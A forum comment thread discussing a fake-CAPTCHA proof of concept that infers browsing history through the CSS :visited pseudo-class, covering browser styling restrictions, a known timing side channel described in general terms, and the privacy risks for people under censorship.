12 votes

Retrieving your browsing history through a fake CAPTCHA

7 comments

  1. [6]
    balooga
    Link
    It's interesting, but considering that a link URL must be a perfect match with one in your history in order to trigger the :visited pseudo-class, it doesn't strike me as a particularly dangerous...

    It's interesting, but considering that a link URL must be a perfect match with one in your history in order to trigger the :visited pseudo-class, it doesn't strike me as a particularly dangerous leak. That's why this proof of concept can detect if you've been to, say, twitter.com, but not a specific user page or tweet.

    OP mentioned that colors are the only properties of visited links that can be styled with CSS. For good reason, otherwise you could brute-force thousands of URLs onto the page and hide the ones that don't match, leaving the victim none the wiser.

    5 votes
    1. petrichor
      Link Parent
      So, browser developers are (rightfully) very concerned with this kind of privacy leak, and go a little bit farther than just restricting CSS styling - there is also no way for a server to access...

      OP mentioned that colors are the only properties of visited links that can be styled with CSS.

      So, browser developers are (rightfully) very concerned with this kind of privacy leak, and go a little bit farther than just restricting CSS styling - there is also no way for a server to access the :visited pseudo-class using JavaScript or anything else, IIRC. Any styling of :visited elements only appears to the end user. The reason why the "capcha" attack works is because you're actively clicking (visited) links, which then is an event that can be exfiltrated back to the server.

      brute-force thousands of URLs onto the page

      Also so, there is actually another attack that can bypass the need to click by kinda doing this. If you load an absolutely ridiculous number of urls (that the user hasn't visited - ie. something long and random) onto a page, and then change them all to a link you suspect the user has visited, the time the browser takes to redraw the page if the link color changes is actually measurable. This is a known issue and a WONTFIX (for performance reasons).

      3 votes
    2. [4]
      aphoenix
      Link Parent
      Consider this scenario though: A person in China is using the web. They have a VPN (or something similar, I'm not actually sure if a VPN is sufficient), and frequently use BBC, Facebook, and...

      Consider this scenario though:

      A person in China is using the web. They have a VPN (or something similar, I'm not actually sure if a VPN is sufficient), and frequently use BBC, Facebook, and YouTube to get around the Great Firewall. They go to a site, fill out this counterfeit CAPTCHA, and out to the government that they use banned sites.

      The privacy issues around :visited are often more insidious than they appear.

      2 votes
      1. [3]
        balooga
        Link Parent
        Hmmm. That's a curious one! I agree there's some potential for abuse in such a scenario. I have questions about the real-world policies of China, regarding access of banned sites. Would simply...

        Hmmm. That's a curious one! I agree there's some potential for abuse in such a scenario. I have questions about the real-world policies of China, regarding access of banned sites. Would simply having the URL in one's browser history be enough to justify an arrest? Seems like there's room for plausible deniability: if you attempt to load a URL but are unable to reach it (because it's blocked, doesn't exist, you're offline, etc.) it still gets saved in your history, even though you didn't retrieve any content from it. Maybe you unintentionally followed a rogue link or redirect. Maybe someone else had access to your computer. Would even the most totalitarian regime act on something so tenuous? I'm not sure.

        3 votes
        1. MimicSquid
          Link Parent
          The answer is probably: "If they wanted a pretext for an action they were boing to take anyway." But at that point, the pretext barely matters.

          The answer is probably: "If they wanted a pretext for an action they were boing to take anyway." But at that point, the pretext barely matters.

          5 votes
        2. aphoenix
          Link Parent
          I don't know specific answers to your questions, but simply transferring the knowledge that you have at least tried to access illicit material to a government that is oppressive is the problem....

          I don't know specific answers to your questions, but simply transferring the knowledge that you have at least tried to access illicit material to a government that is oppressive is the problem. Whether they act on it and disappear the person who did it, or whether they simply put the person on a list to watch, it's all bad.

          The real takeaway is that it took me about a half second to think of a way this plausibly infringes on someone's privacy. Someone who is looking to actively infringe on privacy can likely be a lot more effective at it.

          There's also some history to :visited that may be interesting.

          2 votes
  2. aphoenix
    Link
    A minor note about :visited is that it is actually quite a limited pseudo-element. The only usable CSS properties for :visited are: color background-color border-color, border-bottom-color,...

    A minor note about :visited is that it is actually quite a limited pseudo-element. The only usable CSS properties for :visited are:

    • color
    • background-color
    • border-color, border-bottom-color, border-left-color, border-right-color, border-top-color
    • column-rule-color
    • outline-color
    • text-decoration-color
    • text-emphasis-color.

    Notably, these are all colour related; you cannot extend this to images, due to the privacy restrictions on this pseudo element.

    So don't do captchas that rely entirely on colour!

    4 votes